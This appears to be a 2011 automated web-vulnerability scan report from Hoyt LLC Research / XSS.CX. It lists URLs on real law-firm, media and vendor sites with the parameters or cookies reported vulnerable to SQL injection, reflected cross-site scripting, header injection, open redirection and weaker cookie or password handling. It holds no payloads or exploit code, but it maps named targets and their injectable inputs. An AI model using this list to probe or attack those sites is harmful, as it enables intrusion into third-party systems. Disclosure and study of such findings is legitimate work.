XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-04

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 19:54:51 CDT 2011.




1. SQL injection

1.1. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [dt cookie]

1.2. http://layserfreiwald.com/attorneys.html [AID parameter]

1.3. http://www.mccarter.com/new/biosnew.aspx [Initial parameter]

1.4. http://www.mccarter.com/new/homenew.aspx [show parameter]

1.5. http://www.mccarter.com/new/showbionew.aspx [show parameter]

1.6. http://www.mccarter.com/new/showcareerpagenew.aspx [show parameter]

1.7. http://www.mccarter.com/new/showeventnew.aspx [show parameter]

1.8. http://www.mccarter.com/new/showlocationnew.aspx [show parameter]

1.9. http://www.peckshaffer.com/bonds.php [name of an arbitrarily supplied request parameter]

1.10. http://www.peckshaffer.com/bonds.php [page parameter]

1.11. http://www.pillsburylaw.com/ [CFID cookie]

1.12. http://www.pillsburylaw.com/ [CFTOKEN cookie]

1.13. http://www.pillsburylaw.com/ [MEDIAUSERID cookie]

1.14. http://www.pillsburylaw.com/ [MEDIAUSERNAME cookie]

1.15. http://www.pillsburylaw.com/ [PCONNECTID cookie]

1.16. http://www.pillsburylaw.com/ [PCUSERNAME cookie]

1.17. http://www.pillsburylaw.com/ [__utma cookie]

1.18. http://www.pillsburylaw.com/ [__utmc cookie]

1.19. http://www.pillsburylaw.com/ [__utmz cookie]

1.20. http://www.pillsburylaw.com/ [hsfirstvisit cookie]

1.21. http://www.pillsburylaw.com/ [hubspotdt cookie]

1.22. http://www.pillsburylaw.com/ [hubspotutk cookie]

1.23. http://www.pillsburylaw.com/ [hubspotvd cookie]

1.24. http://www.pillsburylaw.com/ [hubspotvm cookie]

1.25. http://www.pillsburylaw.com/ [hubspotvw cookie]

1.26. http://www.pillsburylaw.com/404.htm [REST URL parameter 1]

1.27. http://www.pillsburylaw.com/a [CFID cookie]

1.28. http://www.pillsburylaw.com/a [CFTOKEN cookie]

1.29. http://www.pillsburylaw.com/a [MEDIAUSERID cookie]

1.30. http://www.pillsburylaw.com/a [MEDIAUSERNAME cookie]

1.31. http://www.pillsburylaw.com/a [PCONNECTID cookie]

1.32. http://www.pillsburylaw.com/a [PCUSERNAME cookie]

1.33. http://www.pillsburylaw.com/a [REST URL parameter 1]

1.34. http://www.pillsburylaw.com/a [__utma cookie]

1.35. http://www.pillsburylaw.com/a [__utmc cookie]

1.36. http://www.pillsburylaw.com/a [__utmz cookie]

1.37. http://www.pillsburylaw.com/a [hsfirstvisit cookie]

1.38. http://www.pillsburylaw.com/a [hubspotdt cookie]

1.39. http://www.pillsburylaw.com/a [hubspotutk cookie]

1.40. http://www.pillsburylaw.com/a [hubspotvd cookie]

1.41. http://www.pillsburylaw.com/a [hubspotvm cookie]

1.42. http://www.pillsburylaw.com/a [hubspotvw cookie]

1.43. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFID cookie]

1.44. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFTOKEN cookie]

1.45. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERID cookie]

1.46. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERNAME cookie]

1.47. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCONNECTID cookie]

1.48. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCUSERNAME cookie]

1.49. http://www.pillsburylaw.com/connect_forgotpassword.cfm [REST URL parameter 1]

1.50. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utma cookie]

1.51. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmb cookie]

1.52. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmc cookie]

1.53. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmz cookie]

1.54. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hsfirstvisit cookie]

1.55. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotdt cookie]

1.56. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotutk cookie]

1.57. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvd cookie]

1.58. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvm cookie]

1.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvw cookie]

1.60. http://www.pillsburylaw.com/index.cfm [CFID cookie]

1.61. http://www.pillsburylaw.com/index.cfm [CFTOKEN cookie]

1.62. http://www.pillsburylaw.com/index.cfm [MEDIAUSERID cookie]

1.63. http://www.pillsburylaw.com/index.cfm [MEDIAUSERNAME cookie]

1.64. http://www.pillsburylaw.com/index.cfm [PCONNECTID cookie]

1.65. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

1.66. http://www.pillsburylaw.com/index.cfm [REST URL parameter 1]

1.67. http://www.pillsburylaw.com/index.cfm [__utma cookie]

1.68. http://www.pillsburylaw.com/index.cfm [__utmb cookie]

1.69. http://www.pillsburylaw.com/index.cfm [__utmc cookie]

1.70. http://www.pillsburylaw.com/index.cfm [__utmz cookie]

1.71. http://www.pillsburylaw.com/index.cfm [hsfirstvisit cookie]

1.72. http://www.pillsburylaw.com/index.cfm [hubspotdt cookie]

1.73. http://www.pillsburylaw.com/index.cfm [hubspotutk cookie]

1.74. http://www.pillsburylaw.com/index.cfm [hubspotvd cookie]

1.75. http://www.pillsburylaw.com/index.cfm [hubspotvm cookie]

1.76. http://www.pillsburylaw.com/index.cfm [hubspotvw cookie]

1.77. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 1]

1.78. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 2]

1.79. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFID cookie]

1.80. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFTOKEN cookie]

1.81. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERID cookie]

1.82. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERNAME cookie]

1.83. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCONNECTID cookie]

1.84. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCUSERNAME cookie]

1.85. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 1]

1.86. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 2]

1.87. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 3]

1.88. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utma cookie]

1.89. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmb cookie]

1.90. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmc cookie]

1.91. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmz cookie]

1.92. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hsfirstvisit cookie]

1.93. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotdt cookie]

1.94. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotutk cookie]

1.95. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvd cookie]

1.96. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvm cookie]

1.97. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvw cookie]

1.98. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 1]

1.99. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 2]

1.100. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.101. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.102. http://www.pomerantzlaw.com/practice-areas.html [PracticeAreaID parameter]

1.103. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html [User-Agent HTTP header]

1.104. http://www.superlawyers.com/redir [User-Agent HTTP header]

1.105. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm [NewsID parameter]

1.106. http://www.wiggin.com/showarea.aspx [Show parameter]

2. File path traversal

3. XPath injection

4. HTTP header injection

4.1. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5 [REST URL parameter 1]

4.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3 [REST URL parameter 1]

5. Cross-site scripting (reflected)

5.1. http://ds.addthis.com/red/psi/sites/www.dmoc.com/p.json [callback parameter]

5.2. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

5.3. http://ds.addthis.com/red/psi/sites/www.letipli.com/p.json [callback parameter]

5.4. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

5.5. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [callback parameter]

5.6. http://ds.addthis.com/red/psi/sites/www.wi-ala.org/p.json [callback parameter]

5.7. http://gigablast.com/ [c parameter]

5.8. http://labs.natpal.com/trac/js/ena.js [trkDomain parameter]

5.9. http://layserfreiwald.com/attorneys.html [mode parameter]

5.10. http://m.perkinscoie.com/publications/ [name of an arbitrarily supplied request parameter]

5.11. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [REST URL parameter 1]

5.12. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [name of an arbitrarily supplied request parameter]

5.13. http://www.gartner.com/0_admin/PasswordRequest.jsp [startPage parameter]

5.14. http://www.gigablast.com/ [c parameter]

5.15. http://www.gigablast.com/search [q parameter]

5.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.17. http://www.hartfordbusiness.com/fs_webkit/fs_css_processor.php [src parameter]

5.18. http://www.hartfordbusiness.com/news14300.html [REST URL parameter 1]

5.19. http://www.letipli.com/favicon.ico [REST URL parameter 1]

5.20. http://www.letipli.com/member_details.asp [REST URL parameter 1]

5.21. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 1]

5.22. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 2]

5.23. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 3]

5.24. http://www.mccarter.com/new/homenew.aspx [name of an arbitrarily supplied request parameter]

5.25. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.26. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.27. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

5.28. http://www.ngelaw.com/about/honors_awards.aspx [name of an arbitrarily supplied request parameter]

5.29. http://www.ngelaw.com/attorney/attorney.aspx [name of an arbitrarily supplied request parameter]

5.30. http://www.ngelaw.com/attorney/bio.aspx [name of an arbitrarily supplied request parameter]

5.31. http://www.ngelaw.com/attorney/results.aspx [letter parameter]

5.32. http://www.ngelaw.com/attorney/results.aspx [name of an arbitrarily supplied request parameter]

5.33. http://www.ngelaw.com/news/detail.aspx [name of an arbitrarily supplied request parameter]

5.34. http://www.ngelaw.com/news/event_detail.aspx [name of an arbitrarily supplied request parameter]

5.35. http://www.ngelaw.com/news/events.aspx [name of an arbitrarily supplied request parameter]

5.36. http://www.ngelaw.com/news/publications.aspx [name of an arbitrarily supplied request parameter]

5.37. http://www.ngelaw.com/practice/practice.aspx [name of an arbitrarily supplied request parameter]

5.38. http://www.nytimes.com/2007/02/09/business/09legal.html [REST URL parameter 5]

5.39. http://www.nytimes.com/2009/01/13/business/13bail.html [REST URL parameter 5]

5.40. http://www.nytimes.com/2009/06/19/business/19scrushy.html [REST URL parameter 5]

5.41. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html [name of an arbitrarily supplied request parameter]

5.42. http://www.ober.com/favicon.ico [REST URL parameter 1]

5.43. http://www.ober.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.44. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [REST URL parameter 1]

5.45. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [REST URL parameter 2]

5.46. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [name of an arbitrarily supplied request parameter]

5.47. http://www.ober.com/practices/32 [REST URL parameter 1]

5.48. http://www.ober.com/practices/32 [REST URL parameter 2]

5.49. http://www.ober.com/practices/32 [name of an arbitrarily supplied request parameter]

5.50. http://www.ober.com/practices/55 [REST URL parameter 1]

5.51. http://www.ober.com/practices/55 [REST URL parameter 2]

5.52. http://www.ober.com/practices/55 [name of an arbitrarily supplied request parameter]

5.53. http://www.ober.com/practices/index [REST URL parameter 1]

5.54. http://www.ober.com/practices/index [REST URL parameter 2]

5.55. http://www.ober.com/practices/index [name of an arbitrarily supplied request parameter]

5.56. http://www.ober.com/practices/intellectual-property [REST URL parameter 1]

5.57. http://www.ober.com/practices/intellectual-property [REST URL parameter 2]

5.58. http://www.ober.com/practices/intellectual-property [name of an arbitrarily supplied request parameter]

5.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]

5.60. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]

5.61. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]

5.62. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP [REST URL parameter 4]

5.63. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP [name of an arbitrarily supplied request parameter]

5.64. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver [REST URL parameter 4]

5.65. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver [name of an arbitrarily supplied request parameter]

5.66. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP [REST URL parameter 4]

5.67. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP [name of an arbitrarily supplied request parameter]

5.68. http://www.wiggin.com/about.aspx [REST URL parameter 1]

5.69. http://www.wiggin.com/about.aspx [name of an arbitrarily supplied request parameter]

5.70. http://www.wiggin.com/about.aspx [name of an arbitrarily supplied request parameter]

5.71. http://www.wiggin.com/alumni.aspx [REST URL parameter 1]

5.72. http://www.wiggin.com/alumni.aspx [name of an arbitrarily supplied request parameter]

5.73. http://www.wiggin.com/alumni.aspx [name of an arbitrarily supplied request parameter]

5.74. http://www.wiggin.com/alumniregistration.aspx [REST URL parameter 1]

5.75. http://www.wiggin.com/alumniregistration.aspx [name of an arbitrarily supplied request parameter]

5.76. http://www.wiggin.com/alumniregistration.aspx [name of an arbitrarily supplied request parameter]

5.77. http://www.wiggin.com/areas.aspx [REST URL parameter 1]

5.78. http://www.wiggin.com/areas.aspx [name of an arbitrarily supplied request parameter]

5.79. http://www.wiggin.com/areas.aspx [name of an arbitrarily supplied request parameter]

5.80. http://www.wiggin.com/bios.aspx [REST URL parameter 1]

5.81. http://www.wiggin.com/bios.aspx [name of an arbitrarily supplied request parameter]

5.82. http://www.wiggin.com/bios.aspx [name of an arbitrarily supplied request parameter]

5.83. http://www.wiggin.com/careers.aspx [REST URL parameter 1]

5.84. http://www.wiggin.com/careers.aspx [name of an arbitrarily supplied request parameter]

5.85. http://www.wiggin.com/careers.aspx [name of an arbitrarily supplied request parameter]

5.86. http://www.wiggin.com/index.aspx [REST URL parameter 1]

5.87. http://www.wiggin.com/index.aspx [name of an arbitrarily supplied request parameter]

5.88. http://www.wiggin.com/index.aspx [name of an arbitrarily supplied request parameter]

5.89. http://www.wiggin.com/resource/404.aspx [REST URL parameter 2]

5.90. http://www.wiggin.com/resource/cal.js [REST URL parameter 1]

5.91. http://www.wiggin.com/resource/cal.js [REST URL parameter 2]

5.92. http://www.wiggin.com/resource/cal.js [name of an arbitrarily supplied request parameter]

5.93. http://www.wiggin.com/resource/showoffice.aspx [REST URL parameter 2]

5.94. http://www.wiggin.com/showAdvisory.aspx [REST URL parameter 1]

5.95. http://www.wiggin.com/showSupremeCourtUpdate.aspx [REST URL parameter 1]

5.96. http://www.wiggin.com/showarea.aspx [REST URL parameter 1]

5.97. http://www.wiggin.com/showarea.aspx [name of an arbitrarily supplied request parameter]

5.98. http://www.wiggin.com/showarea.aspx [name of an arbitrarily supplied request parameter]

5.99. http://www.wiggin.com/showbio.aspx [REST URL parameter 1]

5.100. http://www.wiggin.com/showdepartment.aspx [REST URL parameter 1]

5.101. http://www.wiggin.com/showevent.aspx [REST URL parameter 1]

5.102. http://www.wiggin.com/shownews.aspx [REST URL parameter 1]

5.103. http://www.wiggin.com/showoffice.aspx [REST URL parameter 1]

5.104. http://www.wi-ala.org/clubportal/loginretrieval.cfm [Referer HTTP header]

5.105. http://pillsburylaw.app4.hubspot.com/salog.js.aspx [hsfirstvisit cookie]

5.106. http://pillsburylaw.app4.hubspot.com/salog.js.aspx [hubspotutk cookie]

5.107. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.108. http://www.pillsburylaw.com/ [PCUSERNAME cookie]

5.109. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

6. Flash cross-domain policy

6.1. http://ad.doubleclick.net/crossdomain.xml

6.2. http://attorney.findlaw.com/crossdomain.xml

6.3. http://b.scorecardresearch.com/crossdomain.xml

6.4. http://capgroup.112.2o7.net/crossdomain.xml

6.5. http://cspix.media6degrees.com/crossdomain.xml

6.6. http://d1.openx.org/crossdomain.xml

6.7. http://ehg-findlaw.hitbox.com/crossdomain.xml

6.8. http://ox-d.gartner.com/crossdomain.xml

6.9. http://pixel.33across.com/crossdomain.xml

6.10. http://u.openx.net/crossdomain.xml

6.11. http://www.bloomberg.com/crossdomain.xml

6.12. http://www.nldhlaw.com/crossdomain.xml

6.13. http://feeds.bbci.co.uk/crossdomain.xml

6.14. http://googleads.g.doubleclick.net/crossdomain.xml

6.15. http://imagesrv.gartner.com/crossdomain.xml

6.16. https://my.gartner.com/crossdomain.xml

6.17. http://newsrss.bbc.co.uk/crossdomain.xml

6.18. http://timespeople.nytimes.com/crossdomain.xml

6.19. http://w.sharethis.com/crossdomain.xml

6.20. http://www.cnbc.com/crossdomain.xml

6.21. http://www.forbes.com/crossdomain.xml

6.22. http://www.ft.com/crossdomain.xml

6.23. http://www.gartner.com/crossdomain.xml

6.24. https://www.gartner.com/crossdomain.xml

6.25. http://www.law.com/crossdomain.xml

6.26. http://www.marketwatch.com/crossdomain.xml

6.27. http://www.npr.org/crossdomain.xml

6.28. http://www.nytimes.com/crossdomain.xml

6.29. http://www.stumbleupon.com/crossdomain.xml

6.30. http://www.usatoday.com/crossdomain.xml

6.31. http://www.washingtonpost.com/crossdomain.xml

6.32. http://centrifugesystems.app101.hubspot.com/crossdomain.xml

6.33. http://pillsburylaw.app4.hubspot.com/crossdomain.xml

6.34. http://www.boston.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://attorney.findlaw.com/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://capgroup.112.2o7.net/clientaccesspolicy.xml

7.5. http://pixel.33across.com/clientaccesspolicy.xml

7.6. http://www.usatoday.com/clientaccesspolicy.xml

7.7. http://www.cnbc.com/clientaccesspolicy.xml

7.8. http://www.microsoft.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

8.2. http://www.hartfordbusiness.com/news14300.html

8.3. http://www.hartfordbusiness.com/news14300.html

8.4. http://www.orangecountyala.org/clubportal/memlogin.cfm

8.5. http://www.pillsburylaw.com/

8.6. http://www.pillsburylaw.com/index.cfm

8.7. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

8.8. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

8.9. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

8.10. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

8.11. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

8.12. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

8.13. http://www.wi-ala.org/ClubPortal/wala/

8.14. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

8.15. http://www.wi-ala.org/clubportal/memLogin.cfm

8.16. http://www.wi-ala.org/clubportal/wala/Page.cfm

9. XML injection

9.1. http://gigablast.com/ [c parameter]

9.2. http://www.gigablast.com/ [c parameter]

10. SQL statement in request parameter

11. SSL cookie without secure flag set

11.1. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/clientDetectionOutputs.aspx

11.2. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/clientDetectionVariablesForPost.aspx

11.3. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

11.4. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

11.5. https://my.gartner.com/portal/server.pt

11.6. https://www.gartner.com/login/loginInitAction.do

11.7. https://sso.gartner.com/sp/startSSO.ping

12. Session token in URL

13. SSL certificate

13.1. https://sa-live.com/

13.2. https://citrix.howardrice.com/

13.3. https://client.poynerspruill.com/

13.4. https://mail.howardrice.com/

13.5. https://my.gartner.com/

13.6. https://sso.gartner.com/

13.7. https://www.gartner.com/

13.8. https://www.google.com/

13.9. https://www.pillsburylaw.com/

14. Password field submitted using GET method

15. ASP.NET ViewState without MAC enabled

15.1. http://www.howardrice.com/

15.2. http://www.howardrice.com/6862

15.3. http://www.howardrice.com/Alumni

15.4. http://www.howardrice.com/Events

16. Open redirection

16.1. http://gigablast.com/ [redir parameter]

16.2. https://sa-live.com/l [url parameter]

16.3. http://www.gigablast.com/ [redir parameter]

17. Cookie scoped to parent domain

17.1. http://www.gartner.com/include/webtrends.jsp

17.2. http://www.gartner.com/js/optionsArray.jsp

17.3. http://www.gartner.com/technology/home.jsp

17.4. http://www.gartner.com/technology/include/metricsHelper.jsp

17.5. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

17.6. http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657

17.7. http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943

17.8. http://b.scorecardresearch.com/b

17.9. http://c.statcounter.com/t.php

17.10. http://cf.addthis.com/red/p.json

17.11. http://cspix.media6degrees.com/orbserv/hbpix

17.12. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

17.13. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json

17.14. http://ehg-findlaw.hitbox.com/HG

17.15. http://ehg-findlaw.hitbox.com/HGct

17.16. http://id.google.com/verify/EAAAAC-ut1obpQ8XP13MxYguTAY.gif

17.17. http://id.google.com/verify/EAAAAM2aT2sSooWAii6U_OlsGlM.gif

17.18. http://id.google.com/verify/EAAAAMIzcwu2zbAQKxdU-MyvDzM.gif

17.19. http://labs.natpal.com/trk/pixel

17.20. http://maps.google.com/maps

17.21. http://meter-svc.nytimes.com/meter.js

17.22. http://pixel.33across.com/ps/

17.23. http://r.openx.net/set

17.24. http://u.openx.net/w/1.0/sc

17.25. http://vlog.leadforce1.com/bf/bf.php

17.26. http://www.bing.com/fd/fb/r

17.27. http://www.bing.com/fd/ls/GLinkPing.aspx

17.28. http://www.bing.com/search

17.29. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

17.30. http://www.google.com/finance

17.31. http://www.linkedin.com/companies/peck-shaffer-&-williams

17.32. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

17.33. http://www.nytimes.com/2007/02/09/business/09legal.html

17.34. http://www.nytimes.com/2009/01/13/business/13bail.html

17.35. http://www.nytimes.com/2009/06/19/business/19scrushy.html

17.36. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

18. Cookie without HttpOnly flag set

18.1. http://baxterhall.com/

18.2. http://layserfreiwald.com/

18.3. http://mail.howardrice.com/

18.4. https://my.gartner.com/portal/server.pt

18.5. http://www.elfaonline.org/pub/news/indnews/news_report.cfm

18.6. http://www.emergingvision.com/our_brands.html

18.7. http://www.fundingpost.com/breakfast/reg1.asp

18.8. http://www.gartner.com/technology/home.jsp

18.9. http://www.gartner.com/technology/include/metricsHelper.jsp

18.10. http://www.glaala.org/clubportal/glaala/index.cfm

18.11. http://www.goclubexe.com/clubportal/

18.12. http://www.hartfordbusiness.com/news14300.html

18.13. http://www.jdtplaw.com/

18.14. http://www.jdtplaw.com/

18.15. http://www.jdtplaw.com/CM/Custom/ClientSuccesses.asp

18.16. http://www.jdtplaw.com/CM/NewsResources/JDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminent-Lawyers.asp

18.17. http://www.jdtplaw.com/PracticeAreas/Real-Estate.asp

18.18. http://www.law.com/jsp/article.jsp

18.19. http://www.law.com/jsp/nj/PubArticleNJ.jsp

18.20. http://www.layserfreiwald.com/

18.21. http://www.letipli.com/_rknet_css.asp

18.22. http://www.letipli.com/member_details.asp

18.23. http://www.linkedin.com/companies/peck-shaffer-&-williams

18.24. http://www.mccarter.com/

18.25. http://www.mccarter.com/new/homenew.aspx

18.26. http://www.mccarter.com/new/showlocationnew.aspx

18.27. http://www.memberize.com/

18.28. http://www.milbank.com/en

18.29. http://www.ngelaw.com/

18.30. http://www.njbiz.com/article.asp

18.31. http://www.njsba.com/calendar_events/annualMeetingBlog/index.cfm

18.32. http://www.nldhlaw.com/

18.33. http://www.orangecountyala.org/clubportal/ocala/

18.34. http://www.pillsburylaw.com/

18.35. http://www.pillsburylaw.com/a

18.36. http://www.pillsburylaw.com/connect_forgotpassword.cfm

18.37. http://www.pillsburylaw.com/index.cfm

18.38. http://www.pillsburylaw.com/scripts/images/arrows-default.png

18.39. http://www.powelltrachtman.com/

18.40. http://www.powelltrachtman.com/CM/Custom/Case-Studies.asp

18.41. http://www.rothmanconsulting.com/

18.42. http://www.rtacpa.com/

18.43. http://www.semmes.com/attorney_search.asp

18.44. http://www.sleepertechnologies.com/

18.45. http://www.smithmazure.com/

18.46. http://www.superlawyers.com/redir

18.47. http://www.sutphinblvdbid.org/

18.48. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

18.49. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

18.50. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

18.51. http://www.wendel.com/

18.52. http://www.wi-ala.org/

18.53. http://www.wi-ala.org/ClubPortal/wala/

18.54. http://www.wi-ala.org/clubportal/

18.55. http://www.wiggin.com/

18.56. http://ads.keypromedia.com/www/delivery/ajs.php

18.57. http://ads.keypromedia.com/www/delivery/lg.php

18.58. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

18.59. http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657

18.60. http://attorney.findlaw.com/b/ss/findlaw-16733,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s3923935114943

18.61. http://b.scorecardresearch.com/b

18.62. http://c.statcounter.com/t.php

18.63. http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182

18.64. http://centrifugesystems.app101.hubspot.com/salog.js.aspx

18.65. http://cf.addthis.com/red/p.json

18.66. http://cspix.media6degrees.com/orbserv/hbpix

18.67. http://d1.openx.org/spc.php

18.68. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

18.69. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json

18.70. http://ehg-findlaw.hitbox.com/HG

18.71. http://ehg-findlaw.hitbox.com/HG

18.72. http://ehg-findlaw.hitbox.com/HG

18.73. http://ehg-findlaw.hitbox.com/HGct

18.74. http://ehg-findlaw.hitbox.com/HGct

18.75. http://ehg-findlaw.hitbox.com/HGct

18.76. http://labs.natpal.com/trk/pixel

18.77. http://m.perkinscoie.com/

18.78. http://m.perkinscoie.com/practices/

18.79. http://m.perkinscoie.com/publications/

18.80. http://maps.google.com/maps

18.81. http://meter-svc.nytimes.com/meter.js

18.82. http://ox-d.gartner.com/w/1.0/ajs

18.83. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

18.84. http://pixel.33across.com/ps/

18.85. http://r.openx.net/set

18.86. https://sso.gartner.com/sp/startSSO.ping

18.87. http://u.openx.net/w/1.0/sc

18.88. http://vlog.leadforce1.com/bf/bf.php

18.89. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

18.90. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

18.91. http://www.bing.com/fd/fb/r

18.92. http://www.bing.com/fd/ls/GLinkPing.aspx

18.93. http://www.bing.com/search

18.94. http://www.capgroup.com/

18.95. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

18.96. http://www.gartner.com/0_admin/TechnicalSupportPhone.jsp

18.97. http://www.gartner.com/5_about/company_information/images/privacy_disclosure_head2.gif

18.98. http://www.gartner.com/5_about/news/css/content.css

18.99. http://www.gartner.com/7_search/js/Options.js

18.100. http://www.gartner.com/css/menu.css

18.101. http://www.gartner.com/css/win/homepage.css

